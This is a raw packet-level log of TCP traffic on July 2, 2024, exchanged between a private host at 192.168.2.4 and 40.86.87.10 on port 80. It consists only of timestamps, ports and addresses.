Jul 2, 2024 07:31:11.958302021 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958388090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958399057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958410978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958426952 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958450079 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958450079 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958559036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958570004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958583117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958595037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958595991 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958605051 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958628893 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958628893 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958802938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958815098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958827972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958838940 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958839893 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958848000 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958851099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.958867073 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958878994 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.958884954 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959067106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959079027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959091902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959103107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959108114 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959115982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959115982 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959136009 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959148884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959157944 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959317923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959328890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959345102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959366083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959367037 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959378004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959389925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959395885 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959402084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959407091 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959420919 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959448099 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959810972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959822893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959832907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959845066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959856987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959858894 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959867954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959878922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959882021 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959891081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959901094 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959903955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959914923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.959919930 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959939957 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.959949970 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.960606098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960617065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960628033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960639000 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960649967 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960654974 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.960660934 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960671902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960678101 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.960681915 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960685015 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.960695982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960705996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960716963 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.960716963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960728884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960732937 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.960740089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960750103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960760117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.960761070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960772038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960774899 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.960784912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960793018 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.960796118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.960808039 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.960829973 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.961395025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961406946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961417913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961429119 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961441040 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961452007 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961452961 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.961452961 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.961462975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961473942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961484909 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.961484909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961496115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961498976 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.961502075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961508989 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.961513042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961524010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961535931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961535931 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.961546898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961559057 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.961564064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961575031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961581945 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.961586952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961599112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.961600065 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.961608887 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.961635113 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.962296963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.962308884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.962321997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.962332964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.962343931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.962343931 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.962354898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.962364912 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.962368011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.962378979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:11.962384939 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.962394953 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:11.962420940 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.077378988 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077394962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077408075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077418089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077430964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077481031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077492952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077503920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077512980 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.077567101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077573061 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.077578068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077589989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077601910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077604055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.077611923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077639103 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.077661037 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.077847958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077858925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077869892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077882051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.077889919 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.077912092 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.077934980 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.078088999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078099966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078109980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078120947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078131914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078136921 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.078141928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078169107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.078183889 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.078583002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078593969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078605890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078617096 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078628063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078638077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078643084 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.078649998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078660965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078670979 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.078672886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078682899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078689098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.078697920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.078712940 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.078722000 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.078752041 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.079422951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.079432964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.079443932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.079453945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.079466105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.079477072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.079478979 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.079488039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.079499960 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.079500914 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.079509974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.079524040 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.079535961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.079535961 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.079546928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.079555988 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.079580069 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.079607010 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080177069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080188036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080199003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080209970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080220938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080229998 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080231905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080245018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080249071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080255985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080269098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080279112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080284119 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080285072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080296040 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080296993 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080305099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080315113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080327988 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080334902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080346107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080355883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080358028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080365896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080377102 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080404997 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080598116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080610037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080621004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080635071 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080645084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080646038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080657005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080666065 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080668926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080682993 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080696106 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080715895 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080745935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080759048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080769062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080780983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080786943 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080792904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080801010 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080804110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080813885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080816984 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080826044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080837965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080848932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080849886 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080849886 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080858946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.080864906 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080885887 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.080908060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.081624031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.081635952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.081640959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.081645966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.081651926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.081657887 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.081670046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.081681013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.081691027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.081701994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.081710100 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.081727028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.081744909 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.197068930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197103024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197113991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197159052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197185040 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.197246075 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.197401047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197412968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197432041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197443008 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.197458982 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.197472095 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.197572947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197585106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197598934 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197611094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197621107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.197630882 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.197659969 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.197824955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197835922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197845936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197855949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197868109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197874069 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.197880983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197891951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.197902918 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.197916031 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.197949886 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.198086977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198131084 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.198160887 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198179007 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198190928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198204994 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.198215008 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.198235989 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.198312044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198322058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198332071 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198343039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198365927 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.198386908 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.198442936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198455095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198466063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198478937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198488951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198491096 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.198506117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198506117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.198517084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198529959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198532104 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.198542118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.198558092 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.198570967 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.198596954 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.199209929 CEST	80	49730	40.86.87.10	192.168.2.4
